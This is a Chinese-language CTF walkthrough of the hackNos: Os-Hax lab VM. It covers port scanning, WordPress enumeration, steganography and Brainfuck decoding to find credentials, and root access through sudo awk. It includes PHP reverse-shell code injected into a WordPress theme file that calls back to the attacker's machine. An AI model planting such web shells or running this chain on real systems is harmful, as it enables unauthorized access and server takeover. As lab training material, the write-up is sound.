0x00 关于hackNos: Os-Hax

说明

hackNos: Os-Hax

Name: hackNos: Os-Hax
Date release: 1 Nov 2019

Author: Rahul Gehlaut
Series: hackNos
Web page: https://www.hacknos.com/os-hax-ctf-vulhub-download-rahulgehlaut/

Difficulty : Intermediate
Flag : boot-root
Learing : exploit | web application Security | Privilege Escalation
Contact .. https://www.linkedin.com/in/rahulgehlaut/
This works better in VirtualBox than VMware

下载地址

Download:
Download (Mirror):
Download (Torrent):

0x01 环境搭建

将下载好的OVA导入到Virtual Box中,然后将靶机与Kali Linux的网络连接方式都调为NAT网络或者Host-Only,确保两台主机在同一网段下就行了。

0x02 信息收集

主机发现

Kali机ip:192.168.10.4
目标机ip:192.168.10.7
os_hax_1.png

端口扫描

nmap -Pn -A -p- 192.168.10.7
os_hax_2.png

目标开放端口:

端口描述
22ssh
80http

指纹信息

os_hax_3.png

目录扫描

大体目录结构就如下面了:
os_hax_4.png

后面递归扫描就跳过了。。等早不到入口再来康

0x03 漏洞挖掘

/etc/hosts添加192.168.10.7 localhost
看到wordpress就直接拿wpscan去扫一下,最后得到了一个用户名:web,但是密码爆破不出来
之前扫出的web根录下没啥可用东西,就不贴图了
去其它目录下找找看
最后在http://192.168.10.7/img/下找到一个flaghost.png图片
查看图片EXIF信息

EXIF信息,是可交换图像文件的缩写,是专门为数码相机的照片设定的,可以记录数码照片的属性信息和拍摄数据。EXIF可以附加于JPEG、TIFF、RIFF等文件之中,为其增加有关数码相机拍摄信息的内容和索引图或图像处理软件的版本信息。

kali下装一个图片exif信息查看工具exiftool:
apt-get install exiftool
查看图片信息:
exiftool flaghost.png
os_hax_5.png

下载Stegsolve.jar工具,windows下有java环境直接运行,linuxjava -jar Stegsolve.jar
打开图片后点击Analyse->File Format即可
os_hax_6.png

上面的结果得到了一个字符串passw@45
然后我尝试了ssh?并不是,wordpress密码?也不是。。最后去搜了下大佬的Writeup知道了它竟然是一个目录。。
os_hax_7.png

进去之后这里面有两个文件,flag2.txt
点进去后内容如下:
os_hax_9.png

i+++++ +++++ [->++ +++++ +++<] >++++ +++++ +++++ +++++ .<+++ +[->- ---<]
>--.- --.<+ +++++ [->-- ----< ]>--- -.<++ +[->+ ++<]> +++++ .<+++ ++[->
+++++ <]>.+ +.+++ +++++ .---- --.<+ ++[-> +++<] >++++ .<+++ ++++[ ->---
----< ]>-.< +++[- >---< ]>--- .+.-- --.++ +.<

然后我又去搜了下,这似乎是BrainFuck语言
这里有一个解密网站:Brainfuck/Ook! Obfuscation/Encoding
os_hax_10.png

web:Hacker@4514这一看就知道这是wordpress登录用户名和密码,登录进去后在Appearance->Theme Editor下可编辑主题php文件,那么可以在这里插入一句话

<?php
$sock = fsockopen('192.168.10.4','1234');
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>

os_hax_11.png

kali监听,访问index.php即可反弹回shell:
os_hax_12.png

在/home下发现web用户,尝试下密码Hacker@4514登录成功:
os_hax_13.png

emm这里可以直接ssh登录

0x04 提权

sudo -l后有一个awk
去搜了下。没找到相关信息。。
然后又去看了下大佬的WP
有一个工具:Gtfo

该工具的主要功能就是帮助研究人员直接在命令行终端窗口中搜索GTFOBins和LOLBAS代码文件。除此之外,它还可以让研究人员专注于命令行串钩,而无需面对明亮的白色背景的桌面窗口,它可以帮助我们将vim、反向Shell和其他漏洞利用“合为一体”。

附上GTFObins
github项目:gtfo
进去搜索awk可得到提权方法:
os_hax_14.png

直接sudo执行该命令即可提权:
os_hax_15.png


参考文章:oscp——hackNos: Os-Hax

Last modification:February 9th, 2020 at 03:39 pm
如果觉得我的文章对你有用,请随意赞赏